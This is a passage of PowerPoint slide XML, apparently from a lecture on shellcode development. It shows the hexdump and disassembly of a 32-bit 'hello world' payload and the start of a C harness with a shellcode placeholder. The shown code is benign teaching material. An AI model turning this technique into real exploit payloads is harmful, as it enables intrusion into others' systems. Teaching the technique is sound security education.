            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>algh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ./helloworld1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-r--r-- 1 root 50 2012-04-24 19:01 ./helloworld1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="242730816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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hexdump</a:t>
            </a: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smtClean="0"/>
              <a:t>helloworld1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hexdumped</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1628839"/>
            <a:ext cx="7859216" cy="1013098"/>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200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000000  e8 0f 00 00 00 48 65 6c  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>6c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 6f 2c 20 77 6f 72 6c  |.....Hello, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>worl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>|</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000010  64 21 0a 0d 59 b8 04 00  00 00 bb 01 00 00 00 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  |</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>d!..Y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>...........|</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000020  0f 00 00 00 cd 80 b8 01  00 00 00 bb 00 00 00 00  |................|</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000030  cd 80                                             |..|</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000032</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="3068960"/>
            <a:ext cx="7571184" cy="689932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="90487" tIns="44450" rIns="90487" bIns="44450">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Obtained by running the following commands</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hexdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -C ./helloworld1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="214668533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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Disassembly</a:t>
            </a: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smtClean="0"/>
              <a:t>helloworld1 disassembled</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1628839"/>
            <a:ext cx="7859216" cy="3229089"/>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200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000000  E80F000000        call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x14</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000005  48                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000006  656C              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>insb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000008  6C                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>insb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000009  6F                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>outsd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000000A  2C20              sub al,0x20</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000000C  776F              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x7d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000000E  726C              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x7c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000010  64210A            and [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fs:edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>],</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000013  0D59B80400        or eax,0x4b859</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000018  0000              add [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>],al</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000001A  BB01000000        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ebx,0x1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000001F  BA0F000000        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> edx,0xf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000024  CD80              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000026  B801000000        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> eax,0x1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000002B  BB00000000        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ebx,0x0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000030  CD80              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x80</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="4971316"/>
            <a:ext cx="7571184" cy="689932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="90487" tIns="44450" rIns="90487" bIns="44450">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Obtained by running the following command</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ndisasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -b32 ./helloworld1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="278809210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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>skeleton.c</a:t>
            </a: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err="1" smtClean="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> development</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1104900" y="1628839"/>
            <a:ext cx="7211516" cy="2859757"/>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200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unistd.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[] = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“[SHELLCODE]";</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
